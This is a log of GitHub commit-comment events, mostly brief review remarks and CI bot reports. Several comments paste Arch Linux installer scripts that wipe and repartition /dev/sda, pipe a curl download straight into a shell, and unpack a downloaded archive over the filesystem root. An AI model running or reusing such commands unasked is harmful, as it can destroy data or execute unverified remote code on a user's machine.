{"id":"7971270543","type":"CommitCommentEvent","actor":{"login":"jesperstarkar"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29722076,"position":null,"line":null,"path":null,"commit_id":"87791e16fbe1430f50811cfcd85c0abfcabee5d6","created_at":"2018-07-16T15:05:08Z","updated_at":"2018-07-16T15:05:08Z","author_association":"CONTRIBUTOR","body":"THANK you!"}},"created_at":"2018-07-16T15:05:08Z"}
{"id":"7971280979","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29722094,"position":null,"line":null,"path":null,"commit_id":"0b1cbfc7ad547fceef9ab3c3e9084563ad5a68d0","created_at":"2018-07-16T15:06:47Z","updated_at":"2018-07-16T15:06:47Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-285](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-285).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-285-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-16T15:06:47Z"}
{"id":"7971285231","type":"CommitCommentEvent","actor":{"login":"qpwo"},"repo":{"name":"uw-cmg/MAST-ML"},"payload":{"comment":{"id":29722102,"position":null,"line":null,"path":null,"commit_id":"8fc16d4f37bf8b05484addc4e395b8fb94aa8b82","created_at":"2018-07-16T15:07:28Z","updated_at":"2018-07-16T15:07:28Z","author_association":"COLLABORATOR","body":"Hmm see next commit"}},"created_at":"2018-07-16T15:07:28Z"}
{"id":"7971286635","type":"CommitCommentEvent","actor":{"login":"TheBlocks"},"repo":{"name":"SaltieRL/DistributedReplays"},"payload":{"comment":{"id":29722107,"position":null,"line":null,"path":null,"commit_id":"b43e0082055d00368bf542b25b27cd2b28427fb8","created_at":"2018-07-16T15:07:42Z","updated_at":"2018-07-16T15:07:42Z","author_association":"NONE","body":"finna litt bro, the guy that made was mustve been a genious"}},"created_at":"2018-07-16T15:07:42Z"}
{"id":"7971287404","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29722110,"position":null,"line":null,"path":null,"commit_id":"375d63a08d2cb25d7b745c28075953f36a7c5180","created_at":"2018-07-16T15:07:49Z","updated_at":"2018-07-16T15:07:49Z","author_association":"COLLABORATOR","body":"Puzzle `1433-9a8228e9` discovered in   [`src/main/java/com/zerocracy/pm/staff/votes/VsOverElected.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pm/staff/votes/VsOverElected.java)   and submitted as #1435. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-16T15:07:49Z"}
{"id":"7971287467","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29722111,"position":4,"line":166,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T15:07:49Z","updated_at":"2018-07-16T15:07:49Z","author_association":"OWNER","body":"for dipy you can look at http://nipy.org/dipy/#announcements\n\nand check locally with this minimal version if it passes on your machine.\n"}},"created_at":"2018-07-16T15:07:49Z"}
{"id":"7971289084","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/ReentrantIssue"},"payload":{"comment":{"id":29722114,"position":45,"line":45,"path":"contracts/HoneyProcessor.sol","commit_id":"44a5860753abe842e0029718c4e51376598de087","created_at":"2018-07-16T15:08:03Z","updated_at":"2018-07-16T15:08:03Z","author_association":"NONE","body":"How do you protect your attacker from a hidden bug?\r\n"}},"created_at":"2018-07-16T15:08:03Z"}
{"id":"7971289668","type":"CommitCommentEvent","actor":{"login":"johncarl81"},"repo":{"name":"johncarl81/asciidoclet"},"payload":{"comment":{"id":29722116,"position":23,"line":62,"path":"src/main/java/org/asciidoctor/asciidoclet/DocletIterator.java","commit_id":"1bdcdaf5a7ce8b9e42bbc008cb7b29e833d28961","created_at":"2018-07-16T15:08:09Z","updated_at":"2018-07-16T15:08:09Z","author_association":"OWNER","body":"Yes, in `renderDoc`, Asciidoclet just replaces the javadoc text with rendered html text for it to be rendered by the standard doclet later on."}},"created_at":"2018-07-16T15:08:09Z"}
{"id":"7971290514","type":"CommitCommentEvent","actor":{"login":"johncarl81"},"repo":{"name":"johncarl81/asciidoclet"},"payload":{"comment":{"id":29722118,"position":30,"line":69,"path":"src/main/java/org/asciidoctor/asciidoclet/DocletIterator.java","commit_id":"1bdcdaf5a7ce8b9e42bbc008cb7b29e833d28961","created_at":"2018-07-16T15:08:17Z","updated_at":"2018-07-16T15:08:17Z","author_association":"OWNER","body":"Good catch."}},"created_at":"2018-07-16T15:08:17Z"}
{"id":"7971294089","type":"CommitCommentEvent","actor":{"login":"johncarl81"},"repo":{"name":"johncarl81/asciidoclet"},"payload":{"comment":{"id":29722127,"position":12,"line":148,"path":"pom.xml","commit_id":"1bdcdaf5a7ce8b9e42bbc008cb7b29e833d28961","created_at":"2018-07-16T15:08:51Z","updated_at":"2018-07-16T15:08:51Z","author_association":"OWNER","body":"Neat!  That's a great idea."}},"created_at":"2018-07-16T15:08:51Z"}
{"id":"7971295379","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29722129,"position":87,"line":61,"path":"test/Remittance.js","commit_id":"f0ba5fbb23339abefb7975d5beee2f9dabd73ffc","created_at":"2018-07-16T15:09:03Z","updated_at":"2018-07-16T15:09:03Z","author_association":"NONE","body":"Yes, the events are important."}},"created_at":"2018-07-16T15:09:03Z"}
{"id":"7971296525","type":"CommitCommentEvent","actor":{"login":"Lilike2008"},"repo":{"name":"Lilike2008/2008lilike"},"payload":{"comment":{"id":29722131,"position":null,"line":null,"path":null,"commit_id":"6603ee4098e8849fccc096f92004844c060629f2","created_at":"2018-07-16T15:09:13Z","updated_at":"2018-07-16T15:09:13Z","author_association":"OWNER","body":"proba"}},"created_at":"2018-07-16T15:09:13Z"}
{"id":"7971303885","type":"CommitCommentEvent","actor":{"login":"kasbah"},"repo":{"name":"tracespace/tracespace"},"payload":{"comment":{"id":29722142,"position":14,"line":96,"path":"packages/pcb-stackup/index.js","commit_id":"6cbecde59091c6a19123670f1471353855d02f79","created_at":"2018-07-16T15:10:25Z","updated_at":"2018-07-16T15:10:25Z","author_association":"COLLABORATOR","body":"This is actually the `Object.assign` I first noticed when I was looking over #75. "}},"created_at":"2018-07-16T15:10:25Z"}
{"id":"7971304762","type":"CommitCommentEvent","actor":{"login":"qm3ster"},"repo":{"name":"serverless/serverless"},"payload":{"comment":{"id":29722144,"position":null,"line":null,"path":null,"commit_id":"abbd68a1d5caa4c9aa78653252e504caab6877ff","created_at":"2018-07-16T15:10:33Z","updated_at":"2018-07-16T15:10:33Z","author_association":"NONE","body":"Wouldn't this also apply to F#?"}},"created_at":"2018-07-16T15:10:33Z"}
{"id":"7971309195","type":"CommitCommentEvent","actor":{"login":"evgenpatrushev"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29722158,"position":48,"line":34,"path":"DBConnector.py","commit_id":"bb9ff2d8662a9c5d164d65fb3a01cb153a35be7c","created_at":"2018-07-16T15:11:17Z","updated_at":"2018-07-16T15:11:17Z","author_association":"COLLABORATOR","body":"Ну я думаю именно эти строчки\r\n```\r\nurl = getUrlAllCurrency() \r\nr1 = requests.get(url=url)\r\ndata1 = r1.json()\r\n```\r\nнужно вынести в _UrlBuilder_, но вот универсальность мы здесь не получим так как эта функция проходит именно по конкретной таблице которая создается в ините. "}},"created_at":"2018-07-16T15:11:17Z"}
{"id":"7971310164","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29722159,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T15:11:26Z","updated_at":"2018-07-16T15:11:26Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2942 of 2942 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T15:11:26Z"}
{"id":"7971310711","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29722161,"position":62,"line":45,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T15:11:31Z","updated_at":"2018-07-16T15:11:31Z","author_association":"NONE","body":"Well, if you hash the password before then yes there is a challenge. Don't forget that the exchange and Bob interests are not aligned. Alice wants to make sure it is Bob that gave his password. Not that the exchange saw Bob's password floating around.\r\nYou check that it is the exchange calling in. That's important too."}},"created_at":"2018-07-16T15:11:31Z"}
{"id":"7971315083","type":"CommitCommentEvent","actor":{"login":"a2line"},"repo":{"name":"geneweb/geneweb"},"payload":{"comment":{"id":29722165,"position":null,"line":null,"path":null,"commit_id":"cfe14bafec482f5d25a8b495fe25171f4cbe7444","created_at":"2018-07-16T15:12:14Z","updated_at":"2018-07-16T15:12:14Z","author_association":"COLLABORATOR","body":"Oui, faut le PR qu'on ne l’oublie pas et qu'on commence à l'utiliser surtout."}},"created_at":"2018-07-16T15:12:14Z"}
{"id":"7971322826","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29722173,"position":30,"line":28,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T15:13:28Z","updated_at":"2018-07-16T15:13:28Z","author_association":"NONE","body":"Your transaction record is the event log. Then make sure your events are pristine and have the info you want / need."}},"created_at":"2018-07-16T15:13:28Z"}
{"id":"7971323671","type":"CommitCommentEvent","actor":{"login":"seven1m"},"repo":{"name":"kanaka/mal"},"payload":{"comment":{"id":29722175,"position":null,"line":null,"path":null,"commit_id":"6da59ec2f48bdebabee68a2029877b8a7218edfe","created_at":"2018-07-16T15:13:36Z","updated_at":"2018-07-16T15:13:36Z","author_association":"CONTRIBUTOR","body":":+1:"}},"created_at":"2018-07-16T15:13:36Z"}
{"id":"7971324100","type":"CommitCommentEvent","actor":{"login":"GabrielCoelho"},"repo":{"name":"Theanvenger/Tryag-File-Manager-jpeg"},"payload":{"comment":{"id":29722176,"position":null,"line":null,"path":null,"commit_id":"8ae1da35af04ec37b78f14732bd512bd5f18a0af","created_at":"2018-07-16T15:13:41Z","updated_at":"2018-07-16T15:13:41Z","author_association":"NONE","body":"hey man. Recently you hacked the website of an Agency that I work for. Can you please get the website back online? "}},"created_at":"2018-07-16T15:13:41Z"}
{"id":"7971328725","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29722181,"position":87,"line":61,"path":"test/Remittance.js","commit_id":"f0ba5fbb23339abefb7975d5beee2f9dabd73ffc","created_at":"2018-07-16T15:14:24Z","updated_at":"2018-07-16T15:14:24Z","author_association":"NONE","body":"If you want the return value of a function called via a tx have a look at https://github.com/b9lab/debug-api"}},"created_at":"2018-07-16T15:14:24Z"}
{"id":"7971328978","type":"CommitCommentEvent","actor":{"login":"carund"},"repo":{"name":"carund/linux-1.sh"},"payload":{"comment":{"id":29722182,"position":null,"line":null,"path":null,"commit_id":"abc9fce19ec9dcf2b5bacc39ff7f956a2861d54b","created_at":"2018-07-16T15:14:26Z","updated_at":"2018-07-16T15:14:26Z","author_association":"OWNER","body":"#!/bin/bash\r\n\r\n\r\nloadkeys ru\r\nsetfont cyr-sun16\r\n\r\necho '2.3 Синхронизация системных часов'\r\ntimedatectl set-ntp true\r\n\r\necho '2.4 создание разделов'\r\n(\r\n  echo o;\r\n\r\n  echo n;\r\n  echo;\r\n  echo;\r\n  echo;\r\n  echo +100M;\r\n\r\n  echo n;\r\n  echo;\r\n  echo;\r\n  echo;\r\n  echo +20G;\r\n\r\n  echo n;\r\n  echo;\r\n  echo;\r\n  echo;\r\n  echo +1024M;\r\n\r\n  echo n;\r\n  echo p;\r\n  echo;\r\n  echo;\r\n  echo a;\r\n  echo 1;\r\n\r\n  echo w;\r\n) | fdisk /dev/sda\r\n\r\necho 'Ваша разметка диска'\r\nfdisk -l\r\n\r\necho '2.4.2 Форматирование дисков'\r\nmkfs.ext2  /dev/sda1 -L boot\r\nmkfs.ext4  /dev/sda2 -L root\r\nmkswap /dev/sda3 -L swap\r\nmkfs.ext4  /dev/sda4 -L home\r\n\r\necho '2.4.3 Монтирование дисков'\r\nmount /dev/sda2 /mnt\r\nmkdir /mnt/{boot,home}\r\nmount /dev/sda1 /mnt/boot\r\nswapon /dev/sda3\r\nmount /dev/sda4 /mnt/home\r\n\r\necho '3.1 Выбор зеркал для загрузки. Ставим зеркало от Яндекс'\r\necho \"Server = http://mirror.yandex.ru/archlinux/\\$repo/os/\\$arch\" > /etc/pacman.d/mirrorlist\r\n\r\necho '3.2 Установка основных пакетов'\r\npacstrap /mnt base base-devel\r\n\r\necho '3.3 Настройка системы'\r\ngenfstab -pU /mnt >> /mnt/etc/fstab\r\n\r\narch-chroot /mnt sh -c \"$(curl -fsSL carund/linux-1.sh)\"\r\n"}},"created_at":"2018-07-16T15:14:26Z"}
{"id":"7971330320","type":"CommitCommentEvent","actor":{"login":"LaurentEsnault"},"repo":{"name":"LaurentEsnault/Eno"},"payload":{"comment":{"id":29722186,"position":4,"line":31,"path":"src/test/java/fr/insee/eno/main/DummyTestDDI2PDF.java","commit_id":"daeaba352a34b40fb19ebc35d7dba0502e67589f","created_at":"2018-07-16T15:14:40Z","updated_at":"2018-07-16T15:14:40Z","author_association":"OWNER","body":"Test avec esa"}},"created_at":"2018-07-16T15:14:40Z"}
{"id":"7971332433","type":"CommitCommentEvent","actor":{"login":"zaufi"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29722187,"position":null,"line":null,"path":null,"commit_id":"0902becf070f15dfb98af8729182da989754704d","created_at":"2018-07-16T15:15:01Z","updated_at":"2018-07-16T15:15:01Z","author_association":"CONTRIBUTOR","body":"I know :)\nbut since you fix the bug they have nowadays in \"master\" why not to submit\n%)\n\nOn Mon, Jul 16, 2018 at 5:03 PM, Denis Golovan <notifications@github.com>\nwrote:\n\n> I am not related to upstream unfortunately.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MageSlayer/paludis-gentoo-patches/commit/0902becf070f15dfb98af8729182da989754704d#commitcomment-29721158>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAhfa9lPh4oc2g9NNGbhyupvkFPzFJvcks5uHJ1MgaJpZM4VRK6o>\n> .\n>\n"}},"created_at":"2018-07-16T15:15:01Z"}
{"id":"7971333897","type":"CommitCommentEvent","actor":{"login":"carund"},"repo":{"name":"carund/linux-2.sh"},"payload":{"comment":{"id":29722191,"position":null,"line":null,"path":null,"commit_id":"b27aedb12195d6ec4493c2ae2ba655a00292e373","created_at":"2018-07-16T15:15:16Z","updated_at":"2018-07-16T15:15:16Z","author_association":"OWNER","body":"#!/bin/bash\r\necho 'Прписываем имя компьютера'\r\necho \"ked-pc\" > /etc/hostname\r\nln -svf /usr/share/zoneinfo/Asia/Yekaterinburg /etc/localtime\r\n\r\necho '3.4 Добавляем русскую локаль системы'\r\necho \"en_US.UTF-8 UTF-8\" > /etc/locale.gen\r\necho \"ru_RU.UTF-8 UTF-8\" >> /etc/locale.gen \r\n\r\necho 'Обновим текущую локаль системы'\r\nlocale-gen\r\n\r\necho 'Указываем язык системы'\r\necho 'LANG=\"ru_RU.UTF-8\"' > /etc/locale.conf\r\n\r\necho 'Вписываем KEYMAP=ru FONT=cyr-sun16'\r\necho 'KEYMAP=ru' >> /etc/vconsole.conf\r\necho 'FONT=cyr-sun16' >> /etc/vconsole.conf\r\n\r\necho 'Создадим загрузочный RAM диск'\r\nmkinitcpio -p linux\r\n\r\necho 'Создаем root пароль'\r\npasswd\r\n\r\necho '3.5 Устанавливаем загрузчик'\r\npacman -Syy\r\npacman -S grub --noconfirm \r\ngrub-install /dev/sda\r\n\r\necho 'Обновляем grub.cfg'\r\ngrub-mkconfig -o /boot/grub/grub.cfg\r\n\r\necho 'Ставим программу для Wi-fi'\r\npacman -S dialog wpa_supplicant --noconfirm \r\n\r\necho 'Добавляем пользователя'\r\nuseradd -m -g users -G wheel -s /bin/bash edgar\r\n\r\necho 'Устанавливаем пароль пользователя'\r\npasswd edgar\r\necho 'Устанавливаем SUDO'\r\necho '%wheel ALL=(ALL) ALL' >> /etc/sudoers\r\n\r\necho 'Раскомментируем репозиторий multilib Для работы 32-битных приложений в 64-битной системе.'\r\necho '[multilib]' >> /etc/pacman.conf\r\necho 'Include = /etc/pacman.d/mirrorlist' >> /etc/pacman.conf\r\npacman -Syy\r\n\r\necho \"Куда устанавливем Arch Linux на виртуальную машину?\"\r\nread -p \"1 - Да, 0 - Нет: \" vm_setting\r\nif [[ $vm_setting == 0 ]]; then\r\n  gui_install=\"xorg-server xorg-drivers xorg-xinit\"\r\nelif [[ $vm_setting == 1 ]]; then\r\n  gui_install=\"xorg-server xorg-drivers xorg-xinit virtualbox-guest-utils\"\r\nfi\r\n\r\necho 'Ставим иксы и драйвера'\r\npacman -S $gui_install\r\n\r\necho 'Ставим Xfce, LXDM и сеть'\r\npacman -S xfce4 xfce4-goodies lxdm networkmanager network-manager-applet ppp --noconfirm\r\n\r\necho 'Ставим шрифты'\r\npacman -S ttf-liberation ttf-dejavu --noconfirm \r\n\r\necho 'Подключаем автозагрузку менеджера входа и интернет'\r\nsystemctl enable lxdm NetworkManager\r\n\r\necho 'Перезагрузка. После перезагрузки заходим под пользователем'\r\nexit\r\nread -p \"Пауза 3 ceк.\" -t 3\r\nreboot"}},"created_at":"2018-07-16T15:15:16Z"}
{"id":"7971334310","type":"CommitCommentEvent","actor":{"login":"evgenpatrushev"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29722193,"position":34,"line":25,"path":"DBConnector.py","commit_id":"bb9ff2d8662a9c5d164d65fb3a01cb153a35be7c","created_at":"2018-07-16T15:15:20Z","updated_at":"2018-07-16T15:15:20Z","author_association":"COLLABORATOR","body":"Можно и по другому реализовать Singleton, но это по моему оптимальнее. Метод `__new__` это как конструктор который возвращает объект (сам класс). Это удобно для Singleton, потому что если у нас нет еще созданного instance то мы создаем, если уже есть то возвращаем уже созданный.\r\n"}},"created_at":"2018-07-16T15:15:20Z"}
{"id":"7971337223","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29722202,"position":null,"line":null,"path":null,"commit_id":"59383c29a7af226b31df4f72d0e628f9bcbc4b4b","created_at":"2018-07-16T15:15:48Z","updated_at":"2018-07-16T15:15:48Z","author_association":"OWNER","body":"Noted, will fix. I might make the struts switchable as well so they can be disabled. I'm liking all the variants some of these newer parts are getting, it's rewarding when I can plan for it and make it work. I haven't really gotten feedback on if people like having the struts, I like them when they connect to the core stages.\r\n\r\nThe 60s are more meant to be generic boosters since the Delta IV isn't and won't be included on BDB. Don't kill yourself balancing them. The GEM-60 'XL' and the AJ-60A are similar lengths (see the forum screenshot), it might be interesting if they could fill different niches. Maybe the GEM-60XL is less thrust, longer burn... slightly better ISP maybe? Since less thrust could be acheived by VAB-limiting the AJ-60A thrust."}},"created_at":"2018-07-16T15:15:48Z"}
{"id":"7971339906","type":"CommitCommentEvent","actor":{"login":"FilipeNeiva"},"repo":{"name":"vikvik98/ProjetoEventos"},"payload":{"comment":{"id":29722208,"position":null,"line":null,"path":null,"commit_id":"4544af46cc6098ded392a02a5a2c279e4af9051f","created_at":"2018-07-16T15:16:14Z","updated_at":"2018-07-16T15:16:14Z","author_association":"COLLABORATOR","body":"iiiiiii oh la, so verdades verdadeiras"}},"created_at":"2018-07-16T15:16:14Z"}
{"id":"7971343707","type":"CommitCommentEvent","actor":{"login":"zaufi"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29722215,"position":5,"line":323,"path":"CMakeLists.txt","commit_id":"0902becf070f15dfb98af8729182da989754704d","created_at":"2018-07-16T15:16:51Z","updated_at":"2018-07-16T15:16:51Z","author_association":"CONTRIBUTOR","body":"AFAIK, since 1.66 boost have new naming convention for boost::python (and\nothers)...\nMoreover, CMake 3.12 have updated Python finder (and boost find as well %)\n\nOn Mon, Jul 16, 2018 at 5:02 PM, Denis Golovan <notifications@github.com>\nwrote:\n\n> 1.65.0\n> It's latest stable in Gentoo, afaiu.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MageSlayer/paludis-gentoo-patches/commit/0902becf070f15dfb98af8729182da989754704d#commitcomment-29721149>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAhfa9UnVzkIrk1sRthJaajeyhdrNvU0ks5uHJ0PgaJpZM4VRK6o>\n> .\n>\n"}},"created_at":"2018-07-16T15:16:51Z"}
{"id":"7971344077","type":"CommitCommentEvent","actor":{"login":"FHeilmann"},"repo":{"name":"KevinOConnor/klipper"},"payload":{"comment":{"id":29722216,"position":null,"line":null,"path":null,"commit_id":"e35f926ca63c704c55f4824226cb91a6d38fcfa6","created_at":"2018-07-16T15:16:55Z","updated_at":"2018-07-16T15:16:55Z","author_association":"NONE","body":"I was wondering if I could use this functionality to implement idle current reduction in the TMC2660 steppers I'm using. This would require sending an SPI command to the drivers to reduce the current once the steppers are supposed to idle, but also to send another command to raise the current again before any normal stepper movement can continue.\r\n\r\nBut I guess I could simply override the StepperEnablePin of the matching stepper objects to do that right?"}},"created_at":"2018-07-16T15:16:55Z"}
{"id":"7971349556","type":"CommitCommentEvent","actor":{"login":"carund"},"repo":{"name":"carund/linux-3.sh"},"payload":{"comment":{"id":29722225,"position":null,"line":null,"path":null,"commit_id":"7f3a9921d54bd64ea6cd80a6164133684cb55257","created_at":"2018-07-16T15:17:50Z","updated_at":"2018-07-16T15:17:50Z","author_association":"OWNER","body":"#!/bin/bash\r\necho 'Установка AUR (aurman)'\r\nsudo pacman -Syy\r\nsudo pacman -S git --noconfirm\r\n\r\n#Ставим зависимость expac-git\r\ngit clone https://aur.archlinux.org/expac-git.git\r\ncd expac-git\r\nmakepkg -si --noconfirm\r\ncd ..\r\nrm -rf expac-git\r\n\r\n#Ставим aurman\r\ngit clone https://aur.archlinux.org/aurman.git\r\ncd aurman\r\nmakepkg -si --noconfirm --skippgpcheck\r\ncd ..\r\nrm -rf aurman\r\n\r\necho 'Установка программ'\r\nsudo pacman -S firefox ufw --noconfirm\r\n# obs-studio veracrypt freemind  cherrytree gimp libreoffice libreoffice-fresh-ru kdenlive audacity pidgin screenfetch vlc qt4 qbittorrent f2fs-tools dosfstools ntfs-3g alsa-lib alsa-utils gnome-calculator file-roller p7zip unrar gvfs aspell-ru pulseaudio --noconfirm \r\n# aurman -S dropbox joxi obs-linuxbrowser xflux xflux-gui-git purple-vk-plugin purple-facebook pidgin-encryption sublime-text2 hunspell-ru pamac-aur --noconfirm \r\n\r\necho 'Установка тем'\r\naurman -S osx-arc-shadow breeze-obsidian-cursor-theme papirus-maia-icon-theme-git --noconfirm\r\n\r\necho 'Создаем нужные директории'\r\nsudo pacman -S xdg-user-dirs\r\nxdg-user-dirs-update\r\nmkdir ~/Dropbox/\r\nmkdir ~/Dropbox/WALLPAPERS\r\nmkdir ~/Dropbox/WALLPAPERS/GREEN/\r\n\r\necho 'Качаем и устанавливаем настройки Xfce'\r\n# Чтобы сделать копию ваших настоек XFCE выполните команду ниже.\r\n# tar -czf xfce4.tar.gz ~/.config/xfce4\r\n\r\ncd ~/Downloads\r\nwget http://ordanax.ru/arch/xfce4.tar.gz\r\n#rm -rf ~/.config/xfce4\r\ntar -xzf xfce4.tar.gz -C /\r\n\r\necho 'Ставим лого ArchLinux в меню'\r\nwget ordanax.ru/arch/archlinux_logo.png\r\nsudo mv -f ~/Downloads/archlinux_logo.png /usr/share/pixmaps/archlinux_logo.png\r\n\r\necho 'Ставим обои на рабочий стол'\r\nwget ordanax.ru/arch/Deepin_Linux_Manjaro.jpg\r\nsudo mv -f ~/Downloads/Deepin_Linux_Manjaro.jpg ~/Dropbox/WALLPAPERS/GREEN/Deepin_Linux_Manjaro.jpg\r\nrm -rf ~/Downloads/*\r\n\r\necho 'Включаем сетевой экран'\r\nsudo ufw enable\r\n\r\necho 'Установка завершена!'\r\nrm -rf ~/arch_3.sh"}},"created_at":"2018-07-16T15:17:50Z"}
{"id":"7971352377","type":"CommitCommentEvent","actor":{"login":"Michelle12369"},"repo":{"name":"Michelle12369/ponpon"},"payload":{"comment":{"id":29722227,"position":20,"line":192,"path":"CHANGELOG.md","commit_id":"4e20e733ae2d565b80e899d66729fb46bad67201","created_at":"2018-07-16T15:18:18Z","updated_at":"2018-07-16T15:18:18Z","author_association":"OWNER","body":"哈哈哈哈我現在才看到"}},"created_at":"2018-07-16T15:18:18Z"}
{"id":"7971354085","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29722230,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T15:18:35Z","updated_at":"2018-07-16T15:18:35Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T15:18:35Z"}
{"id":"7971358471","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29722238,"position":null,"line":null,"path":null,"commit_id":"9ce8b2982ac366e43b6ad689ff99d2d306a13787","created_at":"2018-07-16T15:19:20Z","updated_at":"2018-07-16T15:19:20Z","author_association":"OWNER","body":"ffff I even remembered to sync down from Github, I think I just forgot to copy the repo files over my KSP install... sorry!"}},"created_at":"2018-07-16T15:19:20Z"}
{"id":"7971358794","type":"CommitCommentEvent","actor":{"login":"justinwoo"},"repo":{"name":"khanage/purescript-indexed-monad"},"payload":{"comment":{"id":29722240,"position":null,"line":null,"path":null,"commit_id":"cf105603868fddc2bcc8eb14778aa8645599929f","created_at":"2018-07-16T15:19:23Z","updated_at":"2018-07-16T15:19:23Z","author_association":"NONE","body":"an updated indexed-monad needs to be published on bower too, everything it uses should be updated now. you should be able to use npm-check-updates and run `ncu -uam bower` and get the right thing that builds"}},"created_at":"2018-07-16T15:19:23Z"}
{"id":"7971360570","type":"CommitCommentEvent","actor":{"login":"mcous"},"repo":{"name":"tracespace/tracespace"},"payload":{"comment":{"id":29722244,"position":14,"line":96,"path":"packages/pcb-stackup/index.js","commit_id":"6cbecde59091c6a19123670f1471353855d02f79","created_at":"2018-07-16T15:19:39Z","updated_at":"2018-07-16T15:19:39Z","author_association":"MEMBER","body":"Oh no! That shouldn't have leaked in. Will take that out"}},"created_at":"2018-07-16T15:19:39Z"}
{"id":"7971361585","type":"CommitCommentEvent","actor":{"login":"crutchcorn"},"repo":{"name":"TheAndroidMaster/Alarmio"},"payload":{"comment":{"id":29722246,"position":null,"line":null,"path":null,"commit_id":"c17b1b59a4439564115cd899410556876a87954f","created_at":"2018-07-16T15:19:48Z","updated_at":"2018-07-16T15:19:48Z","author_association":"NONE","body":"blub blub blub"}},"created_at":"2018-07-16T15:19:48Z"}
{"id":"7971361800","type":"CommitCommentEvent","actor":{"login":"timbgr"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29722247,"position":39,"line":39,"path":"lib/s390base.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-16T15:19:50Z","updated_at":"2018-07-16T15:19:50Z","author_association":"NONE","body":"will the `tee` tool interfere with the exitcode of the script itself ? \r\n\r\nrecently I've tried to use the same approach inside a shell script and `tee` had ruined exitcode so after that the script always returned \"PASS\" "}},"created_at":"2018-07-16T15:19:50Z"}
